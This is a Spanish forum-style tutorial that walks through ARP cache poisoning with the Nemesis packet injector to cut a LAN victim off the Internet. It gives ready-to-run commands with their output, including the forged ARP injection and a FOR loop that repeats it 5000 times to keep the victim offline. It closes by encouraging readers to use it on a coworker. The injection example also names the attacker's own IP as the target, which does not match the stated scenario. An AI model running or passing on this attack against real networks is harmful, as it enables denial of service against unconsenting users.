Teoría:El equipo víctima accede a Internet a través del router. Y a su vez, accede al router pq conoce su dirección IP, q es traducida a dirección MAC a través del protocolo ARP. Por tanto, en última instancia, el equipo víctima accede a Internet mandando paquetes hacia la dirección MAC del router. Si el equipo atacante logra engañar al equipo víctima, haciendole creer q la dirección MAC del router es otra inexistente, el equipo víctima no podrá llegar al router, esto es, no podrá llegar a Internet. Para llevar esto a cabo, el equipo atacante debe enviar un paquete malicioso suplantando la identidad del router y diciéndole al equipo víctima q debe actualizar su tabla ARP con la nueva dirección MAC inexistente.
Aplicación práctica:Envenenamiento ARP
Escenario:Atacante: 10.10.0.69
Víctima: 10.10.0.254
Router / Puerta de Enlace: 10.10.0.33
Herramientas:Vamos a utilizar el inyector de paquetes Némesis @
http://www.packetfactory.net/projects/nemesis/Más información sobre Nemesis en
http://foro.elhacker.net/index.php/topic,33197.0.htmlProcedimiento:1º Obtener las direcciones MACs de los equipos víctima y router a través de sus direcciones IP. Para ello, hacemos un ping a ambos equipos.
2º Obtener la tabla caché ARP de direcciones IP/MAC en el equipo atacante. Esto se hace a través del comando
arp -aEjem:
C:\>arp -a
Interfaz: 10.10.0.69 --- 0x2
Dirección IP Dirección física Tipo
10.10.0.33 00-c0-49-44-b1-d5 dinámico
10.10.0.254 00-20-18-b0-06-df dinámico
C:\>
3º Obtener la tabla caché ARP de direcciones IP/MAC en el equipo víctima. Esto es lo q supuestamente ocurriría en el equipo víctima...
C:\WINDOWS\system32>arp -a
Interfaz: 10.10.0.254 --- 0x2
Dirección IP Dirección física Tipo
10.10.0.33 00-c0-49-44-b1-d5 dinámico
10.10.0.69 00-05-1c-0a-ab-92 dinámico
C:\WINDOWS\system32>
4º Verificar que la víctima tiene conexión a Internet. Esto es lo q supuestamente ocurriría en el equipo víctima...
C:\WINDOWS\system32>ping
www.google.es -t
Haciendo ping a
www.google.akadns.net [66.102.11.99] con 32 bytes de datos:
Respuesta desde 66.102.11.99: bytes=32 tiempo=93ms TTL=241
Respuesta desde 66.102.11.99: bytes=32 tiempo=113ms TTL=237
Respuesta desde 66.102.11.99: bytes=32 tiempo=110ms TTL=237
etc.
5º Inyectar desde el atacante el paquete malicioso que envenena la tabla caché ARP de la víctima con la MAC errónea del router.
Sintaxis de la inyección:
nemesis arp -D IPvictima -S IProuter -H MACrouterC:\>nemesis arp -D 10.10.0.69 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF
ARP Packet Injected
C:\>
6º Obtener la tabla caché ARP de direcciones IP/MAC envenenada en el equipo víctima. Esto es lo q supuestamente ocurriría en el equipo víctima...
C:\WINDOWS\system32>arp -a
Interfaz: 10.10.0.254 --- 0x2
Dirección IP Dirección física Tipo
10.10.0.33 aa-bb-cc-dd-ee-ff dinámico
10.10.0.69 00-05-1c-0a-ab-92 dinámico
C:\WINDOWS\system32>
7º Verificar que la víctima NO tiene conexión a Internet. Esto es lo q supuestamente ocurriría en el equipo víctima...
C:\WINDOWS\system32>ping
www.google.es -t
Haciendo ping a
www.google.akadns.net [66.102.11.99] con 32 bytes de datos:
Tiempo de espera agotado para esta solicitud.
Tiempo de espera agotado para esta solicitud.
Tiempo de espera agotado para esta solicitud.
Tiempo de espera agotado para esta solicitud.
Tiempo de espera agotado para esta solicitud.
Tiempo de espera agotado para esta solicitud.
Tiempo de espera agotado para esta solicitud.
Respuesta desde 66.102.11.99: bytes=32 tiempo=112ms TTL=238
etc.
Como podéis observar, después de cierto tiempo, el sistema Windows de la víctima refrescará su tabla caché ARP con la verdadera dirección MAC del router y, entonces, sí que dispondrá de conexión Internet. Se fastidió el invento?? Noooo... si estamos continua y periódicamente envenenando la tabla caché ARP de la víctima desde el equipo atacante.
Para ello, inyectamos el paquete con Nemesis desde un bucle FOR:
C:\>FOR /L %i IN (1,1,5000) DO nemesis arp -D 10.10.0.69 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF
C:\>nemesis arp -D 10.10.0.69 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF
ARP Packet Injected
C:\>nemesis arp -D 10.10.0.69 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF
ARP Packet Injected
C:\>nemesis arp -D 10.10.0.69 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF
ARP Packet Injected
C:\>nemesis arp -D 10.10.0.69 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF
ARP Packet Injected
C:\>nemesis arp -D 10.10.0.69 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF
ARP Packet Injected
etc.
De esta forma, la víctima no dispondrá de conexión a Internet mientras dure el bucle FOR del atacante...
si has llegado hasta aki te felicito, ya eres capaz de poder dejar sin conexión a tu compi del curro... y otras muchas mas...
dentro de poco seguiré poniéndoos documentos de este tipo si le interesan a alguien, eso espero... xDDD